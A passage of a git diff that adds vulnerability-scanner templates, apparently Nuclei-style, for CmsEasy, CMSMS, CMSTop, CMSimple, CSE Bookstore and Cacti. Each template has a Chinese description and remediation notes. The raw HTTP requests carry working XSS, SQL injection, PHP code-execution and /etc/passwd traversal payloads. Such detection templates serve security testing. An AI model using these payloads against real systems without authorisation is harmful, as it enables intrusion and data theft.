| + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"test") + - '!contains(body,"/?movieName=")' + raw: + - | + GET /?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert("test"}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/CmsEasy-bss-xss.yaml b/config/51pwn/yaml/CMSEASY/CmsEasy-bss-xss.yaml new file mode 100755 index 000000000..44a7037f5 --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/CmsEasy-bss-xss.yaml @@ -0,0 +1,28 @@ +id: CmsEasy-bss-xss +info: + name: CmsEasy_FlashXSS_in_bbs_index.php + author: + - jim2g + description: | + CmsEasy_FlashXSS_in_bbs_index.php存在跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'alert(e10adc3949ba59abbe56e057f20f883e)') + - '!contains(body,''/bbs/index.php'')' + raw: + - | + GET /bbs/index.php/%27%2Balert(e10adc3949ba59abbe56e057f20f883e)%2B%27/?case=file HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/Cmseasy-Http-Head-sqli.yaml b/config/51pwn/yaml/CMSEASY/Cmseasy-Http-Head-sqli.yaml new file mode 100755 index 000000000..75678bb8c --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/Cmseasy-Http-Head-sqli.yaml @@ -0,0 +1,57 @@ +id: Cmseasy-Http-Head-sqli +info: + name: CmsEasy-Http-Head-sql_injection + author: + - jim2g + description: | + Cmseasy-Http-Head-存在sql注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - contains(body_1,'在线支付') + - status_code_2==200 + - contains(body_2,'提交订单成功') + - status_code_3==200 + - contains(body_3,'e10adc3949ba59abbe56e057f20f883e') + extractors: + - name: oid + type: regex + regex: + - case=archive&act=orders&oid=(.*?)" + part: body + internal: true + raw: + - | + GET /index.php?case=archive&act=orders&aid={{num1}} HTTP/1.1 + Host: {{Hostname}} + - | + POST /index.php?case=archive&act=orders&aid={{num1}} HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: 127.0.0.1','1','1'),('1','a','a',(select md5(123456)),'a','a','0','1381393437','127.0.0.1 + + pnums=1&pname=2221&telphone=2321&address=121211&postcode=1323212&content=1232312&submit=+%E6%8F%90%E4%BA%A4+ + - | + GET /index.php?case=archive&act=orders&oid={{oid}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + num1: '{{rand_int(10,500,10)}}' diff --git a/config/51pwn/yaml/CMSEASY/Cmseasy-celive-sqli.yaml b/config/51pwn/yaml/CMSEASY/Cmseasy-celive-sqli.yaml new file mode 100755 index 000000000..ed345f1ec --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/Cmseasy-celive-sqli.yaml @@ -0,0 +1,37 @@ +id: Cmseasy-celive-sqli +info: + name: Cmseasy_Sqli_(celive-live-header.php) + author: + - jim2g + description: |2 + Cmseasy-celive-存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849') + raw: + - | + POST /celive/live/header.php HTTP/1.1 + Host: {{Hostname}} + + xajax=LiveMessage&xajaxargs[0]=name%27,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(md5(1))),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20 + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/Cmseasy_v5-archive-sqli.yaml b/config/51pwn/yaml/CMSEASY/Cmseasy_v5-archive-sqli.yaml new file mode 100755 index 000000000..d32b10c73 --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/Cmseasy_v5-archive-sqli.yaml @@ -0,0 +1,35 @@ +id: Cmseasy_v5-archive-sqli +info: + name: cmseasy5.5_20140818_archive.php_sql注入(php缺陷绕过) + author: + - jim2g + description: | + Cmseasy_v5-archive-存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'202cb962ac59075b964b07152d234b7') + raw: + - | + GET /index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(md5(123),md5(123)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=1 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/cmseasy-aid-sqli.yaml b/config/51pwn/yaml/CMSEASY/cmseasy-aid-sqli.yaml new file mode 100755 index 000000000..00edc8b89 --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/cmseasy-aid-sqli.yaml @@ -0,0 +1,35 @@ +id: cmseasy-aid-sqli +info: + name: Cmseasy_aid参数_注入 + author: + - jim2g + description: | + Cmseasy_aid存在参数_注入 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'c4ca4238a0b923820dcc509a6f75849b') + raw: + - | + GET /index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat%28md5%281%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=1 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/cmseasy-index-CommandExecution.yaml b/config/51pwn/yaml/CMSEASY/cmseasy-index-CommandExecution.yaml new file mode 100755 index 000000000..3ed9f31df --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/cmseasy-index-CommandExecution.yaml @@ -0,0 +1,34 @@ +id: cmseasy-index-CommandExecution +info: + name: cmseasy index.php 命令执行漏洞 + author: + - jim2g + description: | + cmseasy index.php 存在命令执行漏洞 + 是指由于Web应用程序对用户提交的数据过滤不严格,攻击者通过提交恶意构造的参数破坏命令语句结构,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 + severity: critical + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'

PHP Version') + - contains(body,"Configuration File (php.ini)") + raw: + - | + POST /index.php?case=manage&act=guestadd&manage=archive&guest=1 HTTP/1.1 + Host: {{Hostname}} + + catid={?(phpinfo())} + req-condition: true diff --git a/config/51pwn/yaml/CMSEASY/wooyun-2014-069363.yaml b/config/51pwn/yaml/CMSEASY/wooyun-2014-069363.yaml new file mode 100755 index 000000000..e69311538 --- /dev/null +++ b/config/51pwn/yaml/CMSEASY/wooyun-2014-069363.yaml @@ -0,0 +1,28 @@ +id: wooyun-2014-069363 +info: + name: CmsEasy_FlashXSS_in_demo.php + author: + - jim2g + description: | + CmsEasy_FlashXSS_in_demo.php存在跨站脚本漏洞 + XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'alert(e10adc3949ba59abbe56e057f20f883e)') + - '!contains(body,''/demo.php'')' + raw: + - | + GET /demo.php?time=alert(e10adc3949ba59abbe56e057f20f883e) HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSMS/CVE-2018-10523-1.yaml b/config/51pwn/yaml/CMSMS/CVE-2018-10523-1.yaml new file mode 100755 index 000000000..8026ceaa3 --- /dev/null +++ b/config/51pwn/yaml/CMSMS/CVE-2018-10523-1.yaml @@ -0,0 +1,25 @@ +id: CVE-2018-10523-1 +info: + name: cmsms_v2.2.7 templates.php存在物理路径泄漏 + author: + - jim2g + description: | + cmsms_v2.2.7 templates.php存在物理路径泄漏 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.cmsmadesimple.org/ \n临时修复方案:\n1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面\n2、将敏感信息进行加密存储,非必要不可发送前端\n3、发送敏感信息时需加密传输,如有必要需脱敏处理\n4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。\n5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口\n令、会话标识jsessionid等), + 防止敏感信息泄漏。\n6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓\n存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。\n7、对必须发送的敏感数据或页面请求接口做好严格的权限认证\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'cmsms\\modules') + raw: + - | + GET /modules/DesignManager/action.ajax_get_templates.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + num1: '{{rand_int(10,500,10)}}' diff --git a/config/51pwn/yaml/CMSMS/CVE-2018-10523.yaml b/config/51pwn/yaml/CMSMS/CVE-2018-10523.yaml new file mode 100755 index 000000000..f7f797eae --- /dev/null +++ b/config/51pwn/yaml/CMSMS/CVE-2018-10523.yaml @@ -0,0 +1,25 @@ +id: CVE-2018-10523 +info: + name: cmsms_v2.2.7 stylesheets.php存在物理路径泄漏 + author: + - jim2g + description: | + cmsms_v2.2.7 stylesheets.php存在物理路径泄漏 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.cmsmadesimple.org/ \n临时修复方案:\n1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面\n2、将敏感信息进行加密存储,非必要不可发送前端\n3、发送敏感信息时需加密传输,如有必要需脱敏处理\n4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。\n5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口\n令、会话标识jsessionid等), + 防止敏感信息泄漏。\n6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓\n存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。\n7、对必须发送的敏感数据或页面请求接口做好严格的权限认证\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'cmsms\\modules') + raw: + - | + GET /modules/FileManager/dunzip.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + num1: '{{rand_int(10,500,10)}}' diff --git a/config/51pwn/yaml/CMSTOP/CMSTop-vote-sqli.yaml b/config/51pwn/yaml/CMSTOP/CMSTop-vote-sqli.yaml new file mode 100755 index 000000000..ccec3e1b7 --- /dev/null +++ b/config/51pwn/yaml/CMSTOP/CMSTop-vote-sqli.yaml @@ -0,0 +1,34 @@ +id: CMSTop-vote-sqli +info: + name: CMSTop vote.php SQL注入漏洞 + author: + - jim2g + description: | + CMSTop vote.php SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cmstop.com/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + raw: + - | + GET /app/?app=vote&controller=vote&action=total&contentid=1 HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSTOP/wooyun-2014-054693.yaml b/config/51pwn/yaml/CMSTOP/wooyun-2014-054693.yaml new file mode 100755 index 000000000..8da9ca5e8 --- /dev/null +++ b/config/51pwn/yaml/CMSTOP/wooyun-2014-054693.yaml @@ -0,0 +1,30 @@ +id: wooyun-2014-054693 +info: + name: cmstop代码执行 + author: + - jim2g + description: | + cmstop存在远程代码执行漏洞 + 当应用程序在调用一些能将字符串转化成代码的函数(如php中的eval)时,没有考虑到用户是否能控制这个字符串,将造成代码注入漏洞。 + 代码注入通常指将可执行代码注入到当前页面中,如php的eval函数,可以将字符串代表的代码作为php代码执行,当前用户能够控制这段字符串时,将产生代码注入漏洞(也称代码执行)。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cmstop.com/ + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"PHP Version") + - contains(body,"Configure Command") + raw: + - | + GET /app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()} HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/CMSimple/CVE-2008-2650.yaml b/config/51pwn/yaml/CMSimple/CVE-2008-2650.yaml new file mode 100755 index 000000000..e0ffbe2f9 --- /dev/null +++ b/config/51pwn/yaml/CMSimple/CVE-2008-2650.yaml @@ -0,0 +1,37 @@ +id: CVE-2008-2650 +info: + name: CMSimple 3.1 - Local File Inclusion + author: + - l0ne1y + description: |- + CMSimple 文件包含漏洞 + CMSimple是丹麦软件开发者Peter Andreas Harteg所研发的一套基于PHP的小型网站内容管理工具。该工具支持所见即所得编辑器、文件自动备份和多种语言等。 + + CMSimple的index.php脚本中没有正确地过滤对sl参数的输入便用于包含本地文件;index.php脚本没有正确地限制对登录用户的访问,可能导致上传任意文件并执行任意PHP代码。成功利用这些漏洞要求打开了register_globals。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cmsimple.org/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - | + GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/CSE Bookstore/CVE-2020-36112.yaml b/config/51pwn/yaml/CSE Bookstore/CVE-2020-36112.yaml new file mode 100755 index 000000000..ee752823c --- /dev/null +++ b/config/51pwn/yaml/CSE Bookstore/CVE-2020-36112.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-36112 +info: + name: CSE Bookstore 1.0 - SQL Injection + author: + - l0ne1y + description: |- + CSE Bookstore 1.0 SQL注入漏洞 + CSE Bookstore 是奥地利Projectworlds公司的一个基于Php的在线书店系统。 + + CSE Bookstore 1.0 存在SQL注入漏洞,攻击者可利用该漏洞转储web应用程序运行的整个数据库。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://projectworlds.in/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + condition: or + part: body + words: + - get book price failed! You have an error in your SQL syntax + - Can't retrieve data You have an error in your SQL syntax + raw: + - | + GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1 + Host: {{Hostname}} diff --git a/config/51pwn/yaml/Cacti/CVE-2020-8813.yaml b/config/51pwn/yaml/Cacti/CVE-2020-8813.yaml new file mode 100755 index 000000000..10e4f3996 --- /dev/null +++ b/config/51pwn/yaml/Cacti/CVE-2020-8813.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-8813 +info: + name: Cacti v1.2.8 - Unauthenticated Remote Code Execution + author: + - gy741 + description: |- + Cacti 操作系统命令注入漏洞 + Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 + + Cacti 1.2.8版本中的graph_realtime.php文件存在安全漏洞。远程攻击者可借助cookie中的shell元字符利用该漏洞执行任意操作系统命令。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + /~https://github.com/Cacti/cacti/releases + + 临时修复方案:
1、尽量不去执行外部的应用程序或命令。
2、使用自定义函数或函数库实现外部应用程序或命令的功能。
3、在执行system、eval等命令执行功能的函数前,校验参数内容。
